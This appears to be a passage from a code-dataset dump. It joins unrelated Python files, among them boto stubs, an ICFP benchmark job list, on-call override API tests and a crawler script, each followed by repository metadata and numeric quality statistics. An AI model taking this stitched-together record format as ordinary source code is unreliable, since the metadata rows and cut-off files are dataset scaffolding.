def connect_vpc(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.vpc.VPCConnection`
    :return: A connection to VPC
    """
    raise BotoClientError('Not Implemented')
def connect_rds(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.rds.RDSConnection`
    :return: A connection to RDS
    """
    raise BotoClientError('Not Implemented')
def connect_emr(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.emr.EmrConnection`
    :return: A connection to Elastic MapReduce
    """
    raise BotoClientError('Not Implemented')
def connect_sns(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.sns.SNSConnection`
    :return: A connection to Amazon's SNS
    """
    raise BotoClientError('Not Implemented')
def connect_iam(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.iam.IAMConnection`
    :return: A connection to Amazon's IAM
    """
    raise BotoClientError('Not Implemented')
def connect_route53(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.route53.connection.Route53Connection`
    :return: A connection to Amazon's Route53 DNS Service
    """
    raise BotoClientError('Not Implemented')
def connect_euca(host=None, aws_access_key_id=None, aws_secret_access_key=None,
                 port=8773, path='/services/Eucalyptus', is_secure=False,
                 **kwargs):
    """
    Connect to a Eucalyptus service.
    :type host: string
    :param host: the host name or ip address of the Eucalyptus server
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.ec2.connection.EC2Connection`
    :return: A connection to Eucalyptus server
    """
    raise BotoClientError('Not Implemented')
def connect_walrus(host=None, aws_access_key_id=None, aws_secret_access_key=None,
                   port=8773, path='/services/Walrus', is_secure=False,
                   **kwargs):
    """
    Connect to a Walrus service.
    :type host: string
    :param host: the host name or ip address of the Walrus server
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.s3.connection.S3Connection`
    :return: A connection to Walrus
    """
    raise BotoClientError('Not Implemented')
def connect_ses(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.ses.SESConnection`
    :return: A connection to Amazon's SES
    """
    raise BotoClientError('Not Implemented')
def connect_sts(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.sts.STSConnection`
    :return: A connection to Amazon's STS
    """
    raise BotoClientError('Not Implemented')
def connect_ia(ia_access_key_id=None, ia_secret_access_key=None,
               is_secure=False, **kwargs):
    """
    Connect to the Internet Archive via their S3-like API.
    :type ia_access_key_id: string
    :param ia_access_key_id: Your IA Access Key ID. This will also look in your
                             boto config file for an entry in the Credentials
                             section called "ia_access_key_id"
    :type ia_secret_access_key: string
    :param ia_secret_access_key: Your IA Secret Access Key. This will also
                                 look in your boto config file for an entry
                                 in the Credentials section called
                                 "ia_secret_access_key"
    :rtype: :class:`boto.s3.connection.S3Connection`
    :return: A connection to the Internet Archive
    """
    raise BotoClientError('Not Implemented')
# vim:set ft=python sw=4 :
| 34.936599 | 85 | 0.727625 | 1,747 | 12,123 | 4.797367 | 0.131082 | 0.195442 | 0.119437 | 0.136976 | 0.717695 | 0.70624 | 0.607684 | 0.565684 | 0.565684 | 0.565684 | 0 | 0.005811 | 0.190877 | 12,123 | 346 | 86 | 35.037572 | 0.848608 | 0.633919 | 0 | 0.372881 | 0 | 0 | 0.093463 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.372881 | false | 0 | 0.169492 | 0 | 0.576271 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
7afbeeb0d62fce8e7b807f6f100acf5f55db87a0 | 9,230 | py | Python | recommend/eusolver/scripts/job_list_icfp_anytime.py | jiry17/IntSy | 36333489b77ff2fbe84e6440be1f6b84eb61f29e | [
"MIT"
] | 7 | 2020-03-01T12:07:44.000Z | 2021-10-20T02:34:59.000Z | recommend/esolver/scripts/job_list_icfp_anytime.py | jiry17/PolyGen | b384e478ec91299d6a14f4681ff3e0850911822b | [
"MIT"
] | 1 | 2020-05-25T22:08:35.000Z | 2020-05-25T22:08:35.000Z | recommend/eusolver/scripts/job_list_icfp_anytime.py | jiry17/IntSy | 36333489b77ff2fbe84e6440be1f6b84eb61f29e | [
"MIT"
] | 1 | 2021-12-01T08:18:21.000Z | 2021-12-01T08:18:21.000Z | # job_list_one_shot.py ---
#
# Filename: job_list_one_shot.py
# Author: Abhishek Udupa
# Created: Tue Jan 26 15:13:19 2016 (-0500)
#
#
# Copyright (c) 2015, Abhishek Udupa, University of Pennsylvania
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. All advertising materials mentioning features or use of this software
# must display the following acknowledgement:
# This product includes software developed by The University of Pennsylvania
# 4. Neither the name of the University of Pennsylvania nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# Code:
[
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_103_10.sl'], 'icfp_103_10-anytime', 'icfp_103_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_113_1000.sl'], 'icfp_113_1000-anytime', 'icfp_113_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_125_10.sl'], 'icfp_125_10-anytime', 'icfp_125_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_14_1000.sl'], 'icfp_14_1000-anytime', 'icfp_14_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_147_1000.sl'], 'icfp_147_1000-anytime', 'icfp_147_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_28_10.sl'], 'icfp_28_10-anytime', 'icfp_28_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_39_100.sl'], 'icfp_39_100-anytime', 'icfp_39_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_51_10.sl'], 'icfp_51_10-anytime', 'icfp_51_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_68_1000.sl'], 'icfp_68_1000-anytime', 'icfp_68_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_72_10.sl'], 'icfp_72_10-anytime', 'icfp_72_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_82_10.sl'], 'icfp_82_10-anytime', 'icfp_82_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_94_1000.sl'], 'icfp_94_1000-anytime', 'icfp_94_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_96_10.sl'], 'icfp_96_10-anytime', 'icfp_96_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_104_10.sl'], 'icfp_104_10-anytime', 'icfp_104_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_114_100.sl'], 'icfp_114_100-anytime', 'icfp_114_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_134_1000.sl'], 'icfp_134_1000-anytime', 'icfp_134_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_143_1000.sl'], 'icfp_143_1000-anytime', 'icfp_143_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_150_10.sl'], 'icfp_150_10-anytime', 'icfp_150_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_30_10.sl'], 'icfp_30_10-anytime', 'icfp_30_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_45_1000.sl'], 'icfp_45_1000-anytime', 'icfp_45_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_54_1000.sl'], 'icfp_54_1000-anytime', 'icfp_54_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_69_10.sl'], 'icfp_69_10-anytime', 'icfp_69_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_73_10.sl'], 'icfp_73_10-anytime', 'icfp_73_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_87_10.sl'], 'icfp_87_10-anytime', 'icfp_87_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_94_100.sl'], 'icfp_94_100-anytime', 'icfp_94_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_99_100.sl'], 'icfp_99_100-anytime', 'icfp_99_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_105_1000.sl'], 'icfp_105_1000-anytime', 'icfp_105_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_118_100.sl'], 'icfp_118_100-anytime', 'icfp_118_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_135_100.sl'], 'icfp_135_100-anytime', 'icfp_135_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_144_1000.sl'], 'icfp_144_1000-anytime', 'icfp_144_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_21_1000.sl'], 'icfp_21_1000-anytime', 'icfp_21_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_32_10.sl'], 'icfp_32_10-anytime', 'icfp_32_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_45_10.sl'], 'icfp_45_10-anytime', 'icfp_45_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_56_1000.sl'], 'icfp_56_1000-anytime', 'icfp_56_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_7_1000.sl'], 'icfp_7_1000-anytime', 'icfp_7_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_81_1000.sl'], 'icfp_81_1000-anytime', 'icfp_81_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_9_1000.sl'], 'icfp_9_1000-anytime', 'icfp_9_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_95_100.sl'], 'icfp_95_100-anytime', 'icfp_95_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_105_100.sl'], 'icfp_105_100-anytime', 'icfp_105_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_118_10.sl'], 'icfp_118_10-anytime', 'icfp_118_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_139_10.sl'], 'icfp_139_10-anytime', 'icfp_139_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_144_100.sl'], 'icfp_144_100-anytime', 'icfp_144_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_25_1000.sl'], 'icfp_25_1000-anytime', 'icfp_25_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_38_10.sl'], 'icfp_38_10-anytime', 'icfp_38_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_5_1000.sl'], 'icfp_5_1000-anytime', 'icfp_5_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_64_10.sl'], 'icfp_64_10-anytime', 'icfp_64_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_7_10.sl'], 'icfp_7_10-anytime', 'icfp_7_10-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_82_100.sl'], 'icfp_82_100-anytime', 'icfp_82_100-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_93_1000.sl'], 'icfp_93_1000-anytime', 'icfp_93_1000-anytime'),
(['python3', 'solvers.py', '--anytime', '3600', 'icfp', '../benchmarks/icfp/icfp_96_1000.sl'], 'icfp_96_1000-anytime', 'icfp_96_1000-anytime')
]
#
# job_list_one_shot.py ends here
| 97.157895 | 150 | 0.676598 | 1,282 | 9,230 | 4.630265 | 0.159906 | 0.117925 | 0.134771 | 0.193733 | 0.540263 | 0.52409 | 0.52409 | 0.52409 | 0.52409 | 0.515836 | 0 | 0.128119 | 0.101083 | 9,230 | 94 | 151 | 98.191489 | 0.587321 | 0.201083 | 0 | 0 | 0 | 0 | 0.721162 | 0.261113 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb056645286e578beacdd13141aef618891149b4 | 6,640 | py | Python | e2e/test_override.py | navoday-91/oncall | 0a977f06bbf308978d0d2c2b46e0aca23937ca9a | [
"BSD-2-Clause"
] | 857 | 2017-05-03T00:59:10.000Z | 2022-03-29T06:45:23.000Z | e2e/test_override.py | navoday-91/oncall | 0a977f06bbf308978d0d2c2b46e0aca23937ca9a | [
"BSD-2-Clause"
] | 142 | 2017-05-03T02:00:58.000Z | 2022-03-25T20:58:11.000Z | e2e/test_override.py | navoday-91/oncall | 0a977f06bbf308978d0d2c2b46e0aca23937ca9a | [
"BSD-2-Clause"
] | 218 | 2017-05-03T02:04:56.000Z | 2022-03-25T18:28:04.000Z | # Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
import requests
import time
from testutils import prefix, api_v0
start, end = int(time.time()), int(time.time() + 36000)
start = start / 1000 * 1000
end = end / 1000 * 1000
# Helper function to send an override request
def override(start_time, end_time, ev_ids, user):
    re = requests.post(api_v0('events/override'),
                       json={'start': start_time,
                             'end': end_time,
                             'event_ids': ev_ids,
                             'user': user})
    assert re.status_code == 200
    return re
# Test override when events need to be split
@prefix('test_v0_override_split')
def test_api_v0_override_split(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start,
                          'end': end,
                          'user': user_name,
                          'team': team_name,
                          'role': role_name})
    re = override(start + 100, end - 100, [ev_id], override_user)
    data = re.json()
    assert len(data) == 3
    re = requests.get(api_v0('events?user=' + user_name))
    events = sorted(re.json(), key=lambda x: x['start'])
    assert len(events) == 2
    assert events[0]['end'] == start + 100
    assert events[1]['start'] == end - 100
    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start + 100
    assert events[0]['end'] == end - 100
# Test override when an event's start needs to be edited
@prefix('test_v0_override_edit_start')
def test_api_v0_override_edit_start(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start,
                          'end': end,
                          'user': user_name,
                          'team': team_name,
                          'role': role_name})
    re = override(start, end - 100, [ev_id], override_user)
    data = re.json()
    assert len(data) == 2
    re = requests.get(api_v0('events?user=' + user_name))
    events = re.json()
    assert len(events) == 1
    assert events[0]['end'] == end
    assert events[0]['start'] == end - 100
    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start
    assert events[0]['end'] == end - 100
# Test override when an event's end needs to be edited
@prefix('test_api_v0_override_edit_end')
def test_api_v0_override_edit_end(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start,
                          'end': end,
                          'user': user_name,
                          'team': team_name,
                          'role': role_name})
    re = override(start + 100, end, [ev_id], override_user)
    data = re.json()
    assert len(data) == 2
    re = requests.get(api_v0('events?user=' + user_name))
    events = re.json()
    assert len(events) == 1
    assert events[0]['end'] == start + 100
    assert events[0]['start'] == start
    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start + 100
    assert events[0]['end'] == end
# Test override when an event needs to be deleted
@prefix('test_api_v0_override_delete')
def test_api_v0_override_delete(team, user, role, event):
    team_name = team.create()
    user_name = user.create()
    override_user = user.create()
    role_name = role.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev_id = event.create({'start': start,
                          'end': end,
                          'user': user_name,
                          'team': team_name,
                          'role': role_name})
    re = override(start - 10, end + 10, [ev_id], override_user)
    assert len(re.json()) == 1
    re = requests.get(api_v0('events?user=' + user_name))
    events = re.json()
    assert len(events) == 0
    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start
    assert events[0]['end'] == end
# Test combination of above cases
@prefix('test_api_v0_override_multiple')
def test_api_v0_override_multiple(team, user, role, event):
    team_name = team.create()
    role_name = role.create()
    user_name = user.create()
    override_user = user.create()
    user.add_to_team(user_name, team_name)
    user.add_to_team(override_user, team_name)
    ev1 = event.create({'start': start-1000,
                        'end': start+1000,
                        'user': user_name,
                        'team': team_name,
                        'role': role_name})
    ev2 = event.create({'start': start+1000,
                        'end': start+2000,
                        'user': user_name,
                        'team': team_name,
                        'role': role_name})
    ev3 = event.create({'start': start+2000,
                        'end': end-1000,
                        'user': user_name,
                        'team': team_name,
                        'role': role_name})
    ev4 = event.create({'start': end-1000,
                        'end': end+1000,
                        'user': user_name,
                        'team': team_name,
                        'role': role_name})
    re = override(start, end, [ev1, ev2, ev3, ev4], override_user)
    assert len(re.json()) == 3
    re = requests.get(api_v0('events?user=' + user_name))
    events = sorted(re.json(), key=lambda x: x['start'])
    assert len(events) == 2
    assert events[0]['start'] == start - 1000
    assert events[0]['end'] == start
    assert events[1]['start'] == end
    assert events[1]['end'] == end + 1000
    re = requests.get(api_v0('events?user=' + override_user))
    events = re.json()
    assert events[0]['start'] == start
    assert events[0]['end'] == end
| 34.051282 | 99 | 0.569428 | 860 | 6,640 | 4.2 | 0.10814 | 0.050941 | 0.061185 | 0.035991 | 0.807309 | 0.746401 | 0.692414 | 0.674142 | 0.652547 | 0.631506 | 0 | 0.035226 | 0.294578 | 6,640 | 194 | 100 | 34.226804 | 0.735909 | 0.064608 | 0 | 0.690789 | 0 | 0 | 0.087069 | 0.021606 | 0 | 0 | 0 | 0 | 0.203947 | 1 | 0.039474 | false | 0 | 0.019737 | 0 | 0.065789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb08c7db08a3a4f46b4d54e98699f5915dfaad1f | 123 | py | Python | Chapter04/deque_tail.py | PacktPublishing/Secret-Recipes-of-the-Python-Ninja | 805d00c7a54927ba94c9077e9a580508ee3c5e56 | [
"MIT"
] | 13 | 2018-06-21T01:44:49.000Z | 2021-12-01T10:49:53.000Z | Chapter04/deque_tail.py | PacktPublishing/Secret-Recipes-of-the-Python-Ninja | 805d00c7a54927ba94c9077e9a580508ee3c5e56 | [
"MIT"
] | null | null | null | Chapter04/deque_tail.py | PacktPublishing/Secret-Recipes-of-the-Python-Ninja | 805d00c7a54927ba94c9077e9a580508ee3c5e56 | [
"MIT"
] | 6 | 2018-10-05T08:29:24.000Z | 2022-01-11T14:49:50.000Z | from collections import deque
def tail(filename, n=10):
    'Return the last n lines of a file'
    with open(filename) as f:
        return deque(f, n)
| 24.6 | 39 | 0.617886 | 22 | 123 | 3.454545 | 0.772727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022472 | 0.276423 | 123 | 4 | 40 | 30.75 | 0.831461 | 0.268293 | 0 | 0 | 0 | 0 | 0.268293 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
bb54dd743272c66fa05ae9d165ff7620f4013ada | 381 | py | Python | ood_samplefree/datasets/utils.py | jm-begon/ood_samplefree | 2c659fa8f2d15487f78c811c3fdeded1b1cfe91c | [
"BSD-3-Clause"
] | 2 | 2021-09-14T12:54:30.000Z | 2021-10-24T02:23:39.000Z | ood_samplefree/datasets/utils.py | jm-begon/ood_samplefree | 2c659fa8f2d15487f78c811c3fdeded1b1cfe91c | [
"BSD-3-Clause"
] | null | null | null | ood_samplefree/datasets/utils.py | jm-begon/ood_samplefree | 2c659fa8f2d15487f78c811c3fdeded1b1cfe91c | [
"BSD-3-Clause"
] | null | null | null | from torch.utils.data import DataLoader, ConcatDataset, Subset
def get_transform(dataset):
    if isinstance(dataset, DataLoader):
        return get_transform(dataset.dataset)
    if isinstance(dataset, ConcatDataset):
        return get_transform(dataset.datasets[0])
    if isinstance(dataset, Subset):
        return get_transform(dataset.dataset)
    return dataset.transform
2474676875cc2c935504da7b72bf8c3ba2c468ac | 542 | py | Python | crawl.py | audrummer15/motif-crawler | 4f3f05ef7304c258c41e5f4e61e13e834a6eb56c | [
"MIT"
] | null | null | null | crawl.py | audrummer15/motif-crawler | 4f3f05ef7304c258c41e5f4e61e13e834a6eb56c | [
"MIT"
] | null | null | null | crawl.py | audrummer15/motif-crawler | 4f3f05ef7304c258c41e5f4e61e13e834a6eb56c | [
"MIT"
] | null | null | null | import os
import subprocess
import pycurl
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
from lib.MotifAuthorizationManager import MotifAuthorizationManager
from lib.RequestHandler import RequestHandler
from lib.SettingsManager import SettingsManager
COOKIEJAR = os.path.join("build", "cookies.txt")
sm = SettingsManager()
mam = MotifAuthorizationManager(sm.getEmail(), sm.getPassword(), sm.getPhone(), COOKIEJAR)
if not mam.isUserAuthorized():
    mam.authorizeUser()
else:
    print "User Authorized"
rh = RequestHandler()
| 24.636364 | 90 | 0.800738 | 59 | 542 | 7.355932 | 0.542373 | 0.048387 | 0.059908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004175 | 0.116236 | 542 | 21 | 91 | 25.809524 | 0.901879 | 0 | 0 | 0 | 0 | 0 | 0.057196 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.0625 | 0.5 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 3 |
24779120f2fb70a303e87b2558dd2ff75366f03a | 152 | py | Python | tr_sys/tr_ars/__init__.py | jdr0887/Relay | 323b954033dc7fc6bd9acc52cfec7133594ee59a | [
"MIT"
] | 4 | 2020-02-06T17:15:46.000Z | 2021-08-30T14:16:40.000Z | tr_sys/tr_ars/__init__.py | jdr0887/Relay | 323b954033dc7fc6bd9acc52cfec7133594ee59a | [
"MIT"
] | 109 | 2020-04-27T21:07:13.000Z | 2022-02-18T18:34:53.000Z | tr_sys/tr_ars/__init__.py | jdr0887/Relay | 323b954033dc7fc6bd9acc52cfec7133594ee59a | [
"MIT"
] | 23 | 2020-01-14T17:02:20.000Z | 2022-02-11T16:20:00.000Z | import logging
logger = logging.getLogger(__name__)
logger.debug('Initializing module %s...' % __name__)
import pymysql
pymysql.install_as_MySQLdb()
| 16.888889 | 52 | 0.782895 | 18 | 152 | 6.055556 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 152 | 8 | 53 | 19 | 0.801471 | 0 | 0 | 0 | 0 | 0 | 0.164474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
2477e99d42671a5856b6477a89453acfc665aa72 | 1,453 | py | Python | src/pipeformer/__init__.py | awslabs/pipeformer | bf7f4f15b4c3698cd7c361a9d376a46980dd2a00 | [
"Apache-2.0"
] | 10 | 2019-03-31T13:46:07.000Z | 2020-08-26T22:40:58.000Z | src/pipeformer/__init__.py | amazon-archives/pipeformer | bf7f4f15b4c3698cd7c361a9d376a46980dd2a00 | [
"Apache-2.0"
] | 39 | 2019-03-13T09:08:25.000Z | 2020-12-14T23:08:09.000Z | src/pipeformer/__init__.py | awslabs/pipeformer | bf7f4f15b4c3698cd7c361a9d376a46980dd2a00 | [
"Apache-2.0"
